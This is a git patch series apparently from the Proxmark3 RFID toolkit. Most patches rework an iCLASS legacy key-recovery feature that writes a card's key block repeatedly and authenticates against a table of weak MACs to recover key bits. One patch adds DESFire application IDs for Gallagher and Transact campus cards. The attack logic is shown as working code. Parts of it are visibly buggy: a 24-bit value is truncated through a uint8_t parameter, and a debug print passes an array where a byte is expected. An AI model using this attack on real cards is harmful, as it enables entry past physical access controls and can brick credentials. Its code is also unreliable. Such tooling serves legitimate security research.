iClass_Recover(iclass_recover_req_t *msg) { @@ -2280,7 +2251,7 @@ void iClass_Recover(iclass_recover_req_t *msg) { //Step3 Calculate New Key uint8_t GenKeyBlock[PICOPASS_BLOCK_SIZE]; uint8_t GenKeyBlock_old[PICOPASS_BLOCK_SIZE]; - uint8_t XorKeyBlock[PICOPASS_BLOCK_SIZE]; + uint8_t xorkeyblock[PICOPASS_BLOCK_SIZE]; generate_single_key_block_inverted(zero_key, index, GenKeyBlock); //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED @@ -2288,10 +2259,10 @@ void iClass_Recover(iclass_recover_req_t *msg) { if(index != 0){ generate_single_key_block_inverted(zero_key, index - 1, GenKeyBlock_old); for (int i = 0; i < 8 ; i++) { - XorKeyBlock[i] = GenKeyBlock[i] ^ GenKeyBlock_old[i]; + xorkeyblock[i] = GenKeyBlock[i] ^ GenKeyBlock_old[i]; } }else{ - memcpy(XorKeyBlock, GenKeyBlock, PICOPASS_BLOCK_SIZE); + memcpy(xorkeyblock, GenKeyBlock, PICOPASS_BLOCK_SIZE); } //Step4 Calculate New Mac @@ -2300,13 +2271,13 @@ void iClass_Recover(iclass_recover_req_t *msg) { uint8_t wb[9] = {0}; blockno = 3; wb[0] = blockno; - memcpy(wb + 1, XorKeyBlock, 8); + memcpy(wb + 1, xorkeyblock, 8); doMAC_N(wb, sizeof(wb), div_key2, mac2); //Step5 Perform Write - if (iclass_writeblock_ext(blockno, XorKeyBlock, mac2, use_mac, shallow_mod)) { + if (iclass_writeblock_ext(blockno, xorkeyblock, mac2, use_mac, shallow_mod)) { Dbprintf("Write block [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); } else { Dbprintf("Write block [%3d/0x%02X] " _RED_("failed"), blockno, blockno); @@ -2332,15 +2303,15 @@ void iClass_Recover(iclass_recover_req_t *msg) { restore: ;//empty statement for compilation - uint8_t partialKey[PICOPASS_BLOCK_SIZE]; - convertToHexArray(bits_found, partialKey); + uint8_t partialkey[PICOPASS_BLOCK_SIZE]; + convertToHexArray(bits_found, partialkey); for (int i = 0; i < 8; i++){ - Dbprintf("Raw Key Partial Bytes: " _GREEN_("[%3d -> 0x%02X]"), i, partialKey); + Dbprintf("Raw Key Partial Bytes: " _GREEN_("[%3d -> 0x%02X]"), i, partialkey); } - uint8_t resetKey[PICOPASS_BLOCK_SIZE]; - convertToHexArray(index, resetKey); + uint8_t resetkey[PICOPASS_BLOCK_SIZE]; + convertToHexArray(index, resetkey); //Calculate reset Mac @@ -2348,10 +2319,10 @@ restore: uint8_t wb[9] = {0}; blockno = 3; wb[0] = blockno; - memcpy(wb + 1, resetKey, 8); + memcpy(wb + 1, resetkey, 8); doMAC_N(wb, sizeof(wb), div_key2, mac2); - if (iclass_writeblock_ext(blockno, resetKey, mac2, use_mac, shallow_mod)) { + if (iclass_writeblock_ext(blockno, resetkey, mac2, use_mac, shallow_mod)) { Dbprintf("Restore of Original Key [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); } else { Dbprintf("Restore of Original Key [%3d/0x%02X] " _RED_("failed"), blockno, blockno); diff --git a/armsrc/iclass.h b/armsrc/iclass.h index 56030acc0..1480ef56c 100644 --- a/armsrc/iclass.h +++ b/armsrc/iclass.h @@ -71,9 +71,6 @@ bool authenticate_iclass_tag(iclass_auth_req_t *payload, picopass_hdr_t *hdr, ui uint8_t get_pagemap(const picopass_hdr_t *hdr); void iclass_send_as_reader(uint8_t *frame, int len, uint32_t *start_time, uint32_t *end_time, bool shallow_mod); -void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]); -void intToBinary(unsigned int num, char *binaryStr, int size); -uint8_t binaryToHex(char *binaryStr); -void convertToHexArray(unsigned int num, uint8_t *partialKey); +void generate_single_key_block_inverted(const uint8_t *startingKey, uint32_t index, uint8_t *keyBlock); void iClass_Recover(iclass_recover_req_t *msg); #endif diff --git a/armsrc/util.c b/armsrc/util.c index 89a5d598b..2c7f6bc49 100644 --- a/armsrc/util.c +++ b/armsrc/util.c @@ -395,3 +395,33 @@ uint32_t flash_size_from_cidr(uint32_t cidr) { uint32_t get_flash_size(void) { return flash_size_from_cidr(*AT91C_DBGU_CIDR); } + +// Function to convert an unsigned int to binary string +void intToBinary(uint8_t num, char *binaryStr, int size) { + binaryStr[size] = '\0'; // Null-terminate the string + for (int i = size - 1; i >= 0; i--) { + binaryStr[i] = (num % 2) ? '1' : '0'; + num /= 2; + } +} + +// Function to convert a binary string to hexadecimal +uint8_t binaryToHex(char *binaryStr) { + return (uint8_t)strtoul(binaryStr, NULL, 2); +} + +// Function to convert an unsigned int to an array of hex values +void convertToHexArray(uint8_t num, uint8_t *partialkey) { + char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator + + // Convert the number to binary string + intToBinary(num, binaryStr, 24); + + // Split the binary string into groups of 3 and convert to hex + for (int i = 0; i < PICOPASS_BLOCK_SIZE; i++) { + char group[4]; + strncpy(group, binaryStr + i * 3, 3); + group[3] = '\0'; // Null-terminate the group string + partialkey[i] = binaryToHex(group); + } +} \ No newline at end of file diff --git a/armsrc/util.h b/armsrc/util.h index 8842b5d8d..709c11c3e 100644 --- a/armsrc/util.h +++ b/armsrc/util.h @@ -88,6 +88,10 @@ int hex2binarray(char *target, char *source); int hex2binarray_n(char *target, const char *source, int sourcelen); int binarray2hex(const uint8_t *bs, int bs_len, uint8_t *hex); +void intToBinary(uint8_t num, char *binaryStr, int size); +uint8_t binaryToHex(char *binaryStr); +void convertToHexArray(uint8_t num, uint8_t *partialKey); + void LED(int led, int ms); void LEDsoff(void); void SpinOff(uint32_t pause); diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index ad6ea39f0..86580b01f 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3845,7 +3845,8 @@ void picopass_elite_nextKey(uint8_t* key) { static int CmdHFiClassRecover(uint8_t key[8]) { uint32_t payload_size = sizeof(iclass_recover_req_t); - uint8_t aa2_standard_key[PICOPASS_BLOCK_SIZE] = {0xFD, 0xCB, 0x5A, 0x52, 0xEA, 0x8F, 0x30, 0x90}; + uint8_t aa2_standard_key[PICOPASS_BLOCK_SIZE] = {0}; + memcpy(aa2_standard_key, iClass_Key_Table[1], PICOPASS_BLOCK_SIZE); iclass_recover_req_t *payload = calloc(1, payload_size); payload->req.use_raw = true; payload->req.use_elite = false; @@ -3920,22 +3921,6 @@ void *generate_key_blocks(void *arg) { return NULL; } -void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]) { - uint32_t carry = index; - memcpy(keyBlock, startingKey, PICOPASS_BLOCK_SIZE); - - for (int j = PICOPASS_BLOCK_SIZE - 1; j >= 0; j--) { - uint8_t increment_value = carry & 0x07; // Use only the last 3 bits of carry - keyBlock[j] = increment_value; // Set the last 3 bits, assuming first 5 bits are always 0 - - carry >>= 3; // Shift right by 3 bits for the next byte - if (carry == 0) { - // If no more carry, break early to avoid unnecessary loops - break; - } - } -} - static int CmdHFiClassLegRecLookUp(const char *Cmd) { //Standalone Command Start diff --git a/client/src/cmdhficlass.h b/client/src/cmdhficlass.h index 8bbab9216..5a4b20aec 100644 --- a/client/src/cmdhficlass.h +++ b/client/src/cmdhficlass.h @@ -42,7 +42,5 @@ void picopass_elite_reset(void); uint32_t picopass_elite_rng(void); uint32_t picopass_elite_lcg(void); uint8_t picopass_elite_nextByte(void); - void *generate_key_blocks(void *arg); -void generate_single_key_block_inverted(const uint8_t startingKey[PICOPASS_BLOCK_SIZE], uint32_t index, uint8_t keyBlock[PICOPASS_BLOCK_SIZE]); #endif From 27cbdd3031b162c92078a59f154be6e371884a7f Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 18:34:36 +0800 Subject: [PATCH 098/112] Update on variables and comments Added missing definition of picopass block size in util.c Changed some variables to full lowercase Added comment explanation on correlation between macs and decimal values --- armsrc/iclass.c | 15 ++++++++++----- armsrc/util.c | 2 ++ 2 files changed, 12 insertions(+), 5 deletions(-) diff --git a/armsrc/iclass.c b/armsrc/iclass.c index cd28350bf..6e112429a 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2228,7 +2228,7 @@ void iClass_Recover(iclass_recover_req_t *msg) { res = iclass_send_cmd_with_retries(cmd_read, sizeof(cmd_read), resp, sizeof(resp), 10, 3, &start_time, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, shallow_mod); - static uint8_t iClass_Mac_Table[8][8] = { //Reference weak macs table + static uint8_t iclass_mac_table[8][8] = { //Reference weak macs table { 0x00, 0x00, 0x00, 0x00, 0xBF, 0x5D, 0x67, 0x7F }, //Expected mac when last 3 bits of each byte are: 000 { 0x00, 0x00, 0x00, 0x00, 0x10, 0xED, 0x6F, 0x11 }, //Expected mac when last 3 bits of each byte are: 001 { 0x00, 0x00, 0x00, 0x00, 0x53, 0x35, 0x42, 0x0F }, //Expected mac when last 3 bits of each byte are: 010 @@ -2239,7 +2239,12 @@ void iClass_Recover(iclass_recover_req_t *msg) { { 0x00, 0x00, 0x00, 0x00, 0xE2, 0xD5, 0x69, 0xE9 } //Expected mac when last 3 bits of each byte are: 111 }; //Viewing the weak macs table card 24 bits (3x8) in the form of a 24 bit decimal number - static uint32_t iClass_Mac_Table_Bit_Values[8] = {0, 2396745, 4793490, 7190235, 9586980, 11983725, 14380470, 16777215}; + static uint32_t iclass_mac_table_bit_values[8] = {0, 2396745, 4793490, 7190235, 9586980, 11983725, 14380470, 16777215}; + +/* iclass_mac_table is a series of weak macs, those weak macs correspond to the different combinations of the last 3 bits of each key byte. +If we concatenate the last three bits of each key byte, we have a 24 bits long binary string. +If we convert that string to decimal we obtain the decimal numbers in iclass_mac_table_bit_values +Xorring the index of iterations against those decimal numbers allows us to retrieve the what was the corresponding sequence of bits of the original key in decimal format. */ uint8_t zero_key[PICOPASS_BLOCK_SIZE] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; uint32_t index = 1; @@ -2287,12 +2292,12 @@ void iClass_Recover(iclass_recover_req_t *msg) { for (int i = 0; i < 8 ; ++i) { //need to craft the authentication payload accordingly - memcpy(msg->req.key, iClass_Mac_Table[i], 8); + memcpy(msg->req.key, iclass_mac_table[i], 8); res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //the mac here needs to be changed, mac 2 is a compiling placeholder if (res == true) { - bits_found = iClass_Mac_Table_Bit_Values[i] ^ index; + bits_found = iclass_mac_table_bit_values[i] ^ index; Dbprintf("Found Card Bits Index: " _GREEN_("[%3d]"), index); - Dbprintf("Mac Table Bit Values: " _GREEN_("[%3d]"), iClass_Mac_Table_Bit_Values[i]); + Dbprintf("Mac Table Bit Values: " _GREEN_("[%3d]"), iclass_mac_table_bit_values[i]); Dbprintf("Decimal Value of Partial Key: " _GREEN_("[%3d]"), bits_found); goto restore; } diff --git a/armsrc/util.c b/armsrc/util.c index 2c7f6bc49..a4cef3264 100644 --- a/armsrc/util.c +++ b/armsrc/util.c @@ -410,6 +410,8 @@ uint8_t binaryToHex(char *binaryStr) { return (uint8_t)strtoul(binaryStr, NULL, 2); } +#define PICOPASS_BLOCK_SIZE 8 + // Function to convert an unsigned int to an array of hex values void convertToHexArray(uint8_t num, uint8_t *partialkey) { char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator From 66b030290aa8a26812e602444bdc7d22b205dcbe Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 18:42:37 +0800 Subject: [PATCH 099/112] Update iclass.c Changed more variables to lowercase --- armsrc/iclass.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/armsrc/iclass.c b/armsrc/iclass.c index 6e112429a..fee90f0c6 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2254,20 +2254,20 @@ Xorring the index of iterations against those decimal numbers allows us to retri while (bits_found == -1){ //Step3 Calculate New Key - uint8_t GenKeyBlock[PICOPASS_BLOCK_SIZE]; - uint8_t GenKeyBlock_old[PICOPASS_BLOCK_SIZE]; + uint8_t genkeyblock[PICOPASS_BLOCK_SIZE]; + uint8_t genkeyblock_old[PICOPASS_BLOCK_SIZE]; uint8_t xorkeyblock[PICOPASS_BLOCK_SIZE]; - generate_single_key_block_inverted(zero_key, index, GenKeyBlock); + generate_single_key_block_inverted(zero_key, index, genkeyblock); //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED //xor the new key against the previously generated key so that we only update the difference if(index != 0){ - generate_single_key_block_inverted(zero_key, index - 1, GenKeyBlock_old); + generate_single_key_block_inverted(zero_key, index - 1, genkeyblock_old); for (int i = 0; i < 8 ; i++) { - xorkeyblock[i] = GenKeyBlock[i] ^ GenKeyBlock_old[i]; + xorkeyblock[i] = genkeyblock[i] ^ genkeyblock_old[i]; } }else{ - memcpy(xorkeyblock, GenKeyBlock, PICOPASS_BLOCK_SIZE); + memcpy(xorkeyblock, genkeyblock, PICOPASS_BLOCK_SIZE); } //Step4 Calculate New Mac From ed8a2d330e1ae479dd43d2689d8f745bea713339 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Fri, 19 Jul 2024 18:46:27 +0800 Subject: [PATCH 100/112] Update cmdhficlass.c --- client/src/cmdhficlass.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 86580b01f..4a50f15c7 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -4027,7 +4027,7 @@ static int CmdHFiClassLegRecLookUp(const char *Cmd) { thread_data[t].keyBlock = calloc(keys_per_thread, PICOPASS_BLOCK_SIZE); if (thread_data[t].keyBlock == NULL) { - PrintAndLogEx(ERROR, "Memory allocation failed for keyBlock in thread %d.", t); + PrintAndLogEx(ERR, "Memory allocation failed for keyBlock in thread %d.", t); for (uint32_t i = 0; i < t; i++) { free(thread_data[i].keyBlock); } @@ -4048,7 +4048,7 @@ static int CmdHFiClassLegRecLookUp(const char *Cmd) { } if (prekey == NULL) { - PrintAndLogEx(ERROR, "Memory allocation failed for prekey."); + PrintAndLogEx(ERR, "Memory allocation failed for prekey."); for (uint32_t t = 0; t < num_threads; t++) { free(thread_data[t].keyBlock); } From 1347dd9e7462bf7df95c761d07c212adc73a6525 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Sat, 20 Jul 2024 01:26:52 +0800 Subject: [PATCH 101/112] Update cmdhficlass.c Removed timeout as we'll definitely go above the timeout timer --- client/src/cmdhficlass.c | 7 ------- 1 file changed, 7 deletions(-) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 4a50f15c7..49bcaf7fe 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3871,13 +3871,6 @@ static int CmdHFiClassRecover(uint8_t key[8]) { clearCommandBuffer(); SendCommandNG(CMD_HF_ICLASS_RECOVER, (uint8_t *)payload, payload_size); - if (WaitForResponseTimeout(CMD_HF_ICLASS_RECOVER, &resp, 2500) == 0) { - PrintAndLogEx(WARNING, "command execute timeout"); - DropField(); - free(payload); - return PM3_ETIMEOUT; - } - if (resp.status == PM3_SUCCESS) { PrintAndLogEx(SUCCESS, "iCLASS Recover " _GREEN_("successful")); } else { From ef2c372380c257025f8842a2b86e07a2bd0a2d56 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Sat, 20 Jul 2024 01:35:03 +0800 Subject: [PATCH 102/112] Update cmdhficlass.c --- client/src/cmdhficlass.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/client/src/cmdhficlass.c b/client/src/cmdhficlass.c index 49bcaf7fe..03d66f797 100644 --- a/client/src/cmdhficlass.c +++ b/client/src/cmdhficlass.c @@ -3871,6 +3871,8 @@ static int CmdHFiClassRecover(uint8_t key[8]) { clearCommandBuffer(); SendCommandNG(CMD_HF_ICLASS_RECOVER, (uint8_t *)payload, payload_size); + WaitForResponse(CMD_HF_ICLASS_RECOVER, &resp); + if (resp.status == PM3_SUCCESS) { PrintAndLogEx(SUCCESS, "iCLASS Recover " _GREEN_("successful")); } else { From 03adc544df52fe7ba875678932de0ea3aa90cbe1 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Sat, 20 Jul 2024 01:42:47 +0800 Subject: [PATCH 103/112] Update util.c --- armsrc/util.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/armsrc/util.c b/armsrc/util.c index a4cef3264..a4d6f2b8b 100644 --- a/armsrc/util.c +++ b/armsrc/util.c @@ -410,8 +410,6 @@ uint8_t binaryToHex(char *binaryStr) { return (uint8_t)strtoul(binaryStr, NULL, 2); } -#define PICOPASS_BLOCK_SIZE 8 - // Function to convert an unsigned int to an array of hex values void convertToHexArray(uint8_t num, uint8_t *partialkey) { char binaryStr[25]; // 24 bits for binary representation + 1 for null terminator @@ -420,7 +418,7 @@ void convertToHexArray(uint8_t num, uint8_t *partialkey) { intToBinary(num, binaryStr, 24); // Split the binary string into groups of 3 and convert to hex - for (int i = 0; i < PICOPASS_BLOCK_SIZE; i++) { + for (int i = 0; i < 8 ; i++) { char group[4]; strncpy(group, binaryStr + i * 3, 3); group[3] = '\0'; // Null-terminate the group string From 7a37ec2655ada64afa4dbc6178280d23d74b8ca2 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Sat, 20 Jul 2024 01:45:53 +0800 Subject: [PATCH 104/112] Update iclass.c --- armsrc/iclass.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/armsrc/iclass.c b/armsrc/iclass.c index fee90f0c6..4b3ce223d 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2293,7 +2293,7 @@ Xorring the index of iterations against those decimal numbers allows us to retri for (int i = 0; i < 8 ; ++i) { //need to craft the authentication payload accordingly memcpy(msg->req.key, iclass_mac_table[i], 8); - res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //the mac here needs to be changed, mac 2 is a compiling placeholder + res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //mac1 here shouldn't matter if (res == true) { bits_found = iclass_mac_table_bit_values[i] ^ index; Dbprintf("Found Card Bits Index: " _GREEN_("[%3d]"), index); From 469e9d875bdc0123071a862252cae7972c3a0363 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Sun, 21 Jul 2024 12:04:35 +1000 Subject: [PATCH 105/112] R&Y: Re-Added Gallagher AIDs and Added Transact Campus AIDs **Re-Added Gallagher AIDs** - The alternative endian Gallagher AIDs have been re-added out of an abundance of caution. **Added Transact Campus AIDs** - The AIDs were retrieved from an Institution's Guest Card via NXP TagInfo and PM3; a Google search revealed that `Transact Card, Inc.` are the ID Card provider for said Institution, so the Institution has not been explicitly named. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 162 +++++++++++++++++++++++++++++- 1 file changed, 161 insertions(+), 1 deletion(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index 263d30f58..655aeadc0 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -23,6 +23,134 @@ "Description": "Default Secondary Application", "Type": "pacs" }, + { + "AID": "2081F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2181F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2281F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2381F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2481F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2581F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2681F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2781F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2881F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2981F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2A81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2B81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2C81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2D81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2E81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Unused Cardax Card Data Application (Alternative Endian)", + "Type": "pacs" + }, + { + "AID": "2F81F4", + "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", + "Country": "NZ", + "Name": "Gallagher Security Credential", + "Description": "Card Application Directory (CAD) (Alternative Endian)", + "Type": "pacs" + }, { "AID": "4791DA", "Vendor": "Prima Systems", @@ -188,7 +316,7 @@ "Vendor": "Gallagher Group Limited via PEC (New Zealand) Limited", "Country": "NZ", "Name": "Gallagher Security Credential", - "Description": "Card Application Directory [CAD]", + "Description": "Card Application Directory (CAD)", "Type": "pacs" }, { @@ -407,6 +535,38 @@ "Description": "Campus Card", "Type": "student" }, + { + "AID": "BBBBB3", + "Vendor": "Transact Campus Inc.", + "Country": "US", + "Name": "Transact Campus ID", + "Description": "Campus Card", + "Type": "student" + }, + { + "AID": "BBBBBB", + "Vendor": "Transact Campus Inc.", + "Country": "US", + "Name": "Transact Campus ID", + "Description": "Campus Card", + "Type": "student" + }, + { + "AID": "BBBBDA", + "Vendor": "Transact Campus Inc.", + "Country": "US", + "Name": "Transact Campus ID", + "Description": "Campus Card", + "Type": "student" + }, + { + "AID": "BCBCBC", + "Vendor": "Transact Campus Inc.", + "Country": "US", + "Name": "Transact Campus ID", + "Description": "Campus Card", + "Type": "student" + }, { "AID": "F48EF1", "Vendor": "TU Delft", From f8fbcc2754b49789c810113ca98b51d8f3ebbf99 Mon Sep 17 00:00:00 2001 From: Antiklesys Date: Sun, 21 Jul 2024 13:55:17 +0800 Subject: [PATCH 106/112] Bugfixes and code improvements for hf iclass legrec 1- Inlined functions related to hf iclass legrec within util.c for marginal performance gains. 2- Fixed bug preventing errors to be displayed properly and the process from interrupting on an error or on completion. 3- Fixed code indentation of the while loop in iclass.c 4- Fixed bug in the while cycle (was missing index++) 5- Improved ways to display hex results by using dbhexdump --- armsrc/iclass.c | 117 +++++++++++++++++++++------------------ armsrc/util.c | 26 +++------ armsrc/util.h | 2 - client/src/cmdhficlass.c | 4 +- 4 files changed, 73 insertions(+), 76 deletions(-) diff --git a/armsrc/iclass.c b/armsrc/iclass.c index 4b3ce223d..109b03d8d 100644 --- a/armsrc/iclass.c +++ b/armsrc/iclass.c @@ -2174,6 +2174,7 @@ void iClass_Recover(iclass_recover_req_t *msg) { bool shallow_mod = false; LED_A_ON(); + Dbprintf(_RED_("Interrupting this process will render the card unusable!")); Iso15693InitReader(); //Authenticate with AA2 with the standard key to get the AA2 mac @@ -2253,56 +2254,61 @@ Xorring the index of iterations against those decimal numbers allows us to retri //START LOOP while (bits_found == -1){ - //Step3 Calculate New Key - uint8_t genkeyblock[PICOPASS_BLOCK_SIZE]; - uint8_t genkeyblock_old[PICOPASS_BLOCK_SIZE]; - uint8_t xorkeyblock[PICOPASS_BLOCK_SIZE]; - generate_single_key_block_inverted(zero_key, index, genkeyblock); + //Step3 Calculate New Key + uint8_t genkeyblock[PICOPASS_BLOCK_SIZE]; + uint8_t genkeyblock_old[PICOPASS_BLOCK_SIZE]; + uint8_t xorkeyblock[PICOPASS_BLOCK_SIZE]; + generate_single_key_block_inverted(zero_key, index, genkeyblock); - //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED - //xor the new key against the previously generated key so that we only update the difference - if(index != 0){ - generate_single_key_block_inverted(zero_key, index - 1, genkeyblock_old); - for (int i = 0; i < 8 ; i++) { - xorkeyblock[i] = genkeyblock[i] ^ genkeyblock_old[i]; - } - }else{ + //NOTE BEFORE UPDATING THE KEY WE NEED TO KEEP IN MIND KEYS ARE XORRED + //xor the new key against the previously generated key so that we only update the difference + if(index != 0){ + generate_single_key_block_inverted(zero_key, index - 1, genkeyblock_old); + for (int i = 0; i < 8 ; i++) { + xorkeyblock[i] = genkeyblock[i] ^ genkeyblock_old[i]; + } + }else{ memcpy(xorkeyblock, genkeyblock, PICOPASS_BLOCK_SIZE); - } - - //Step4 Calculate New Mac - - bool use_mac = true; - uint8_t wb[9] = {0}; - blockno = 3; - wb[0] = blockno; - memcpy(wb + 1, xorkeyblock, 8); - - doMAC_N(wb, sizeof(wb), div_key2, mac2); - - //Step5 Perform Write - - if (iclass_writeblock_ext(blockno, xorkeyblock, mac2, use_mac, shallow_mod)) { - Dbprintf("Write block [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); - } else { - Dbprintf("Write block [%3d/0x%02X] " _RED_("failed"), blockno, blockno); - goto out; - } - //Step6 Perform 8 authentication attempts - - for (int i = 0; i < 8 ; ++i) { - //need to craft the authentication payload accordingly - memcpy(msg->req.key, iclass_mac_table[i], 8); - res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //mac1 here shouldn't matter - if (res == true) { - bits_found = iclass_mac_table_bit_values[i] ^ index; - Dbprintf("Found Card Bits Index: " _GREEN_("[%3d]"), index); - Dbprintf("Mac Table Bit Values: " _GREEN_("[%3d]"), iclass_mac_table_bit_values[i]); - Dbprintf("Decimal Value of Partial Key: " _GREEN_("[%3d]"), bits_found); - goto restore; } - } + //Step4 Calculate New Mac + + bool use_mac = true; + uint8_t wb[9] = {0}; + blockno = 3; + wb[0] = blockno; + memcpy(wb + 1, xorkeyblock, 8); + doMAC_N(wb, sizeof(wb), div_key2, mac2); + + //Step5 Perform Write + + DbpString("Generated XOR Key: "); + Dbhexdump(8, xorkeyblock, false); + + if (iclass_writeblock_ext(blockno, xorkeyblock, mac2, use_mac, shallow_mod)) { + Dbprintf("Write block [%3d/0x%02X] " _GREEN_("successful"), blockno, blockno); + } else { + Dbprintf("Write block [%3d/0x%02X] " _RED_("failed"), blockno, blockno); + if (index > 1){ + Dbprintf(_RED_("Card is likely to be unusable!")); + } + goto out; + } + //Step6 Perform 8 authentication attempts + + for (int i = 0; i < 8 ; ++i) { + //need to craft the authentication payload accordingly + memcpy(msg->req.key, iclass_mac_table[i], 8); + res = authenticate_iclass_tag(&msg->req, &hdr, &start_time, &eof_time, mac1); //mac1 here shouldn't matter + if (res == true) { + bits_found = iclass_mac_table_bit_values[i] ^ index; + Dbprintf("Found Card Bits Index: " _GREEN_("[%3d]"), index); + Dbprintf("Mac Table Bit Values: " _GREEN_("[%3d]"), iclass_mac_table_bit_values[i]); + Dbprintf("Decimal Value of Partial Key: " _GREEN_("[%3d]"), bits_found); + goto restore; + } + } + index++; }//end while @@ -2311,10 +2317,6 @@ restore: uint8_t partialkey[PICOPASS_BLOCK_SIZE]; convertToHexArray(bits_found, partialkey); - for (int i = 0; i < 8; i++){ - Dbprintf("Raw Key Partial Bytes: " _GREEN_("[%3d -> 0x%02X]"), i, partialkey); - } - uint8_t resetkey[PICOPASS_BLOCK_SIZE]; convertToHexArray(index, resetkey); @@ -2325,19 +2327,26 @@ restore: blockno = 3; wb[0] = blockno; memcpy(wb + 1, resetkey, 8); - doMAC_N(wb, sizeof(wb), div_key2, mac2); + + //Write back the card to the original key + 